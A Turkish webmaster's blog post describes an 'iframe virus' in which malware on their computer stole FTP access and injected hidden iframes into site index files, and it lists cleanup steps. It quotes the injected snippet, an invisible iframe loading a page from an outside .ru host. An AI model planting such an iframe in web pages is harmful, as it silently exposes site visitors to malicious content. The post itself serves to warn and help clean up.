Son Zamanların Belası : İframe Virüsü

Son günlerde başımızı oldukça ağrıtan bir sorunla karşı karşıyayız. Sunucumuzda bulunan tüm klasörlerde ki index.php,home.php ve index.html dosyalarının son 20 kodu kendi kendine siliniyor.

Enine boyuna düşündük bir çözüm bulamadık. Dosyaları tekrar  upload etmemize rağmen sayfaların belirli bir ksımından sonraki kodlar siliniyordu. En sonundahosting hizmeti aldıımız Hostgator ‘ ın destek uzmanlarıyla konuştuk ve sorunu anladık. Meğersem pc imde bulunan zararlı kodlar yüzünden FTP hesabımıza otomatik olarak giriş yapılmakta ve index.php index.html, default.php,vs … gibi dosyalara iframe ekliyor ve kendi değiştirdiği dosyaları serverımıza yüklüyormuş . Projelerimizin gidişatını sekteye uğratan bu olaydan sonra tüm webmasterlara dikkatli olmaları çağrısında bulunuyorum .

Peki bu virüsten nasıl kurtulabiliriz:

• Öncelikle crackli FTP programlarını kaldırınız. Bunun yerine FileZillayı kullanabilirsiniz.
• FTP den dosyalarını çekin. Sisteminizde tamamen tarayın. Özellikle index.php, index.html, logout.php, header.php, footer.php, home.php,default.php, default.asp gibi sayfalarınızda genellikle <body> etiketinden önce bulunan aşağıdakine benzer kodu silin.</head><body><iframe src=”http://x9w.ru:8080/index.php” width=137 height=190 style=”visibility: hidden”></iframe><div id=”site”>
• Sisteminizi Combofix ile tamamen temizleyin.
• Malware taraması için bu programı indirin.
• Nod32 veya Kaspersky gibi antivirüs programlarıyla sisteminizi baştan sona detaylı taramadan geçirin.
• FTP şifrelerinizi kesinlikle değiştirin. En az 15-20 karakter kullanın .
• Dosyalarınızı Upload edip sisteminizi online hale getirebilirsiniz.

Özellikle zararlı kod bulaşma durumlarında çok dikkatli olmak gerekiyor. Yoksa Sandbox ‘a düşebilir ve sitenizdeki kullanıcı sayısında hızlı bir düşüş yaşayabilirsiniz. Tabi bir de sitenizin imajını negatif yönde etkileyeceğini unutmamak gerek.

No related posts.